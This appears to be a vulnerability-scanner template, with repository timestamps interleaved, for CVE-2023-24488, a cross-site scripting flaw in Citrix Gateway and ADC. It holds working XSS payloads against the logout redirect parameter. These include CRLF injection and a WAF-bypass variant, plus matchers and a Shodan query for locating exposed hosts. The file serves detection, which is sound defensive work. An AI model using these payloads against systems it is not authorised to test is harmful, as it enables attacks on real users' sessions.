2023-06-30 17:58:56 +00:00
id : CVE-2023-24488
info :
name : Citrix Gateway and Citrix ADC - Cross-Site Scripting
2023-07-04 04:29:56 +00:00
author : johnk3r,DhiyaneshDk
2023-06-30 17:58:56 +00:00
severity : medium
description : |
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
reference :
- https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2023-24488
- https://twitter.com/infosec_au/status/1674786106381070342
2023-07-04 04:29:56 +00:00
- https://twitter.com/bxmbn/status/1675250259608449026
2023-06-30 17:58:56 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-24488
cwe-id : CWE-79
metadata :
max-request : 1
shodan-query : title:"Citrix Gateway"
tags : cve,cve2023,citrix,xss,adc
http :
- method : GET
path :
2023-07-04 04:29:56 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'
2023-07-04 08:54:43 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'
2023-06-30 17:58:56 +00:00
2023-07-04 08:54:43 +00:00
stop-at-first-match : true
2023-07-04 04:29:56 +00:00
matchers-condition : and
2023-06-30 17:58:56 +00:00
matchers :
2023-07-04 04:29:56 +00:00
- type : word
part : body
words :
- <body x='&'onload="(alert)('citrix akamai bypass')">
2023-07-04 08:54:43 +00:00
- <script>alert(document.domain)</script>
condition : or
- type : word
part : body
words :
2023-07-04 04:29:56 +00:00
- "Content-Type: text/html"
- type : status
status :
- 302